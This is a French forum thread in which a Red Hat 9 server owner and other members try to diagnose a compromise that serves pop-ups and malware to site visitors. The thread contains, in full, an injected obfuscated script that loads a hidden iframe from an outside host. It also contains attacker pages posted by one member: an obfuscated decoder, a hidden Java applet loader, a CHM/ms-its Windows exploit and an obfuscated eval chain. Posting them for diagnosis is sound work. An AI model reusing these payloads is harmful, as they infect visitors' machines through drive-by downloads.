Mon serveur possédé?

[Furax]

J'ai monté un serveur Linux sur Red Hat 9 fin de l'année dernière et tout fonctionnait très bien jusqu'à maintenant.

Mais surprise hier, de nombreux visiteurs se plaignent que lorsqu'ils viennent sur le site, d'autres fenêtres d'ouvrent toutes seules avec des contenues pas très catholiques, mais aussi et surtout des tentatives d'entrées de spywares et autres virus. J'en fais moi-même l'expérience hier soir alors que je n'ai rien sur le site pouvant provoquer cela.

Bref, je réinstalle Apache "pour voir", et ça rentre dans l'ordre 1 heure puis ça recommence.

Ce matin, plus rien! Tout fonctionne nickel! ... jusqu'à 10H30, puis ça merde de nouveau...

Je n'ai pour le moment pas vu d'attaque de trojan, mais relativement souvent lors d'un clique sur un lien ou même de l'arrivée sur le site, on a droit à une simple page blanche, et un "F5" est nécessaire pour afficher la page.

Vous pouvez avoir quelques explications de la chose sur un sujet ouvert par les membres à cette adresse:

http://www.timeofwar.com/forum/index.php?showtopic=8036

Bref, savez-vous comment se débarraser de cette saloperie? Merci!

[-rem-]

Tu peux me mp ton @ip ou ton nom de site histoire que je te scan ?

[tuXXX]

ben... il y a ptet une faille dans ta version de apache

ou bien sur un autre serveur (ssh?)

donc, moi ce que j'aurait fait, c'est

->mise en place d'un script strict pour iptables (genre ports 80 et 22 seulement, seulement 80 même si possible)

->mise à jour de apache

->si le ssh reste ouvert, le passer en mode de sécurité plus élevé (ssh2 only, par exemple), ainsi que modification des mots de passes importants...

après, il reste les modules pour apache...

[gauret]

Houlà, une redhat 9 que tu a mis à jour avec les patches de sécu j'espère... Sinon il y a les pires trous que tu puisse trouver sur un linux...

A mon avis tu t'es fait rooter. Lance un chkrootkit pour voir.

[Furax]

Alors:

-rem-> C'est fait :)

tuXXX> Il est derrière un firewall avec les ports 80, 21, 10000 ouverts

Apache est à sa dernière version (2.0.52)

ssh non ouvert

Gauret> J'en ai appliqué quelques uns, mais je ne pense pas tous, loin de là... :s

chkrootkit -> command not found

EDIT> J'ai trouvé où télécharger chkrootkit.

[Duke98]

cool le chkrootkit je suis en train de scanner ^ ^

tout est bon, ouf

merci gauret pour l'info

[Furax]

chkrootkit ne m'a rien trouvé non plus.

J'ai passé f-prot sur tout le répertoire du site, rien trouvé. Je vais le passer sur les rep usr et autres pour voir.

EDIT> Je viens d'avoir de nouveau l'alerte anti-virus lorsque je suis allé sur mon webmail (uebimiau), et j'ai vu cette ligne tout en haut du fichier:

<script language=javascript>eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,115,112,108,105,116,105,110,102,105,110,105,116,121,46,105,110,102,111,47,102,97,47,63,100,61,103,101,116,39,32,104,101,105,103,104,116,61,49,32,119,105,100,116,104,61,49,62,60,47,105,102,114,97,109,101,62,34,41))</script>

Copiez-le dans un fichier html, lancez-le, et "admirez", c'est ça, le problème, mais comment est-il venu, et comment le virer? :s

[gauret]

Pas mal l'idée d'encoder son code en javascript ! Perso j'avais jamais vu ça !

Donc le mec a probablement corrompu le compte qui a accès aux fichiers source de uebmiau.

Regarde la commande lastlog et regarde si y'aurait pas des logins en "apache" ou "nobody" par hasard. Ah oui, il a probablement cracké le serveur FTP, tu utilises quoi ?

[ouragan]

<script Language = "JavaScript">

<!--

var keys = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz~`!@#$%^&*()_+-={}|\\][:;?/><,. \n\'\"0";

var newmsg = "";

var newdata = "";

var msg = "";

function Decode()

{

msg = ">naidbs.cZsZ-\'1ChldmrhnmNeDwoknhsrDmb,ogo\'/>?naidbs/";

Find();

}

function Find()

{

for(var i = 0; i < msg.length; i++)

{

newmsg = newmsg + keys.charAt(keys.indexOf(msg.charAt(i))+1);

}

newdata = newdata + newmsg;

newmsg = "";

return 0;

}

//-->

</Script>

<script Language = "JavaScript">

<!--

Decode();

document.write(newdata);

//-->

</Script>

c'est le contenu de http://www.sp2fucked.biz/user28/fuck.htm

<html>

<head>

<script language="JScript">

if (navigator.javaEnabled())

{

document.write("<APPLET ID=\"applt\" ARCHIVE=\"Counters.jar\" CODE=\"Counter.class\" WIDTH=1 HEIGHT=1>\n");

document.write("<PARAM NAME=\"ARGS\" VALUE=\" user_id=33\">\n");

document.write("</APPLET>");

}

</script>

</head>

<body>

</body>

</html>

c'est le contenu de

http://www.sp2fucked.biz/user28/exploit2.htm

<textarea id="code" style="display:none;">

<object data="ms-its:mhtml:file://C:\foo.mht!${PATH}/EXPLOIT.CHM::/exploit.htm" type="text/x-scriptlet"></object>

</textarea>

<script language="javascript">

document.write(code.value.replace(/\${PATH}/g,location.href.substring(0,location.href.indexOf('exploit.htm'))));

</script>

c'est le contenu de

http://www.sp2fucked.biz/user28/exploit.htm

<script language="JavaScript">

<!--

var lang = navigator.systemLanguage;

if (lang == "ru") document.location = "http://sp2fucked.biz/rus.htm";

//-->

</script>

<html>

<head>

</head>

<body>

<IFRAME SRC="exploit2.htm" WIDTH=0 BORDER=0 HEIGHT=0></IFRAME>

<IFRAME SRC="exploit.htm" WIDTH=0 BORDER=0 HEIGHT=0></IFRAME>

<iframe height="1" width="1" src="fuck.htm"></iframe>

<iframe height="1" width="1" src="new/index.html"></iframe>

<script>function o(e,s){if (!s)s='&%/#(")!=?qwertyuioplkjhgfdsa1234567890-.,mnbvcxzASDFGHJKLPOIUYT';var b;var d='';for(var i=0;i<e.length;i+=arguments.callee.toString().length-577){b=(s.indexOf(e.charAt(i))&255)<<18|(s.indexOf(e.charAt(i+1))&255)<<12|(s.indexOf(e.charAt(i+2))&255)<<6|s.indexOf(e.charAt(i+3))&255;d+=String.fromCharCode((b&16711680)>>16,(b&65280)>>8,b&255);}if(e.charCodeAt(i-2)==61) {eval(d.substring(0,d.length-arguments.callee.toString().length+579));}else if(e.charCodeAt(i-1)==61){eval(d.substring(0,d.length-arguments.callee.toString().length+580));}else{eval(d);};}o('sS4-al,7s!u5e),9fSlD1/Luf!iq=0fes#lF1(.,w!iqo#1A=l1K?8vfs!?.d7kFi"eKa05kgJ1wwD9Si0gFooG0eJ?.d7rAt((LklgTw"k)dpkli8(Dfja6r!1-kprSo0IG?6Gfe!=c?jrli0vK?8i7t#Icl)iSoSkK?8,md!?.o#?A=Gec1S(xth1)tp1eo0Um1S"Ff-i)tp1eoG8L2o(Hd6gUajiSwj,z1S(Hf!iwdHLJo0,nal.,eF'+

'AwjpaTt#%01(bxrkiz17iJa)FJ1S"vfGk)?pkfs)8Gk(f%w"k(sprF=Hr8aj1eeJ?qsDl0wk8za6K9gGi)dJ40i)r8aj1usHl5=-5ea)v6?Sz-ukr(i81=o8vel(U?kk9l?6lx=S46qo(UyJ"Jfh?F2hk,sJ%bdH,.fHf8aH(Ae7eFrpgJt#8zwoKbsjL610rK26a,');</script><script>try{eval(cs)}catch(ex){}</script>

</body>

</html>

c'est le contenu de

http://www.sp2fucked.biz/user28/counter.htm

Si ça peut t'être utile,

et le problème n'est toujours pas résolu ou alors c'est dans ton cache ou le cache du fournisseur... Le pire c'est que la première fois que j'ai essayé de me connecter, il m'a donné une réponse: chemin non valide C:\\... visiblement il attaque un système Windows de type exploit shell. Verifie aussi les images. (on ne sait jamais et c'est à la mode).

et du chm comme exploit (-fichiers d'aide intégrés de Windows, dont certains sont utilisés par firefox aussi. )

-Edit : apparement j'ai plus rien qui aparait comme redirection là - le site ne me redirige plus vers ce site sp2.... -

-Edit2: pour ceux qui veulent comprendre pourquoi j'utilise Opera, la réponse est l'accessibilité des données sensibles (comme le cache) quelque soit l'OS avec impossibilité d'affecter le système. (Il est complètement en-dehors du système :) )

[zoto]

salut

Pour scanner les root-kit il y a aussi Rootkit-Hunter, qui effectue plus de type de scan que chkrootkit

voir ici http://www.rootkit.nl/projects/rootkit_hunter.html

Sinon si tu as un forum dessus, regarde que ce ne soit pas du coté de php ou de ta base de donnée qu'il y a un probleme, style une injetion Sql

Ensuite webmin c'est bien, mais restreint au maximum l'acces a Webmin, d'une part en reglant webmin, avec un nombre d'ip le plus petit possible ayant le droit d'y acceder

Ensuite avec iptable, tu peut indiquer que seulement tel ou tel ip a le droit d'y acceder

Enfin tu peut aussi changer le port d'ecoute de webmin, c'est tous bete, c'est de tous faire mais ça le cache un peut

Sinon si tu peux passer a fedora ça serais bien, car red hat ne va plus faire de support pour ta distrib, si ce n'est pas deja fait

Personellement je dirais meme de passer a debian, avec un coup d'apt-get tous les jours pour les mise a jour de securité,et un apt-get tous les deux ans pour changer de distrib, ça reste l'idéel pour monter un serveur

a+

[Furax]

Déjà, merci pour votre aide, ça répond carrément plus vite et avec plus de pertinance sur sur tous les forums Linux sur lesquels je suis allé. :)

gauret> Ca le fait aussi sur le site, pas seulement sur uebimiau, et par exemple hier, ça n'a commencé à merder qu'à 10H30, avant tout fonctionnait bien... zarb.

J'ai passé Clam AV et F-Prot à jour sur tout le serveur, rien déctecté.

J'ai regardé aussi du côté de la base, rien à déclarer

zoto> Je prends en note. :)

J'ai regardé avec lastlog, rien à signaler, le seul utilisateur qui s'est connecté sur le serveur est root, et c'st moi quand j'ai réinstaller Apache entre autres... :(

[gauret]

Vu le nom du site, ça doit être pour dégommer le SP2 de WinXP...

[Furax]

Ouaip.

Tiens, j'ai regardé dans le php.ini et le httpd.conf aussi, mais... Rien.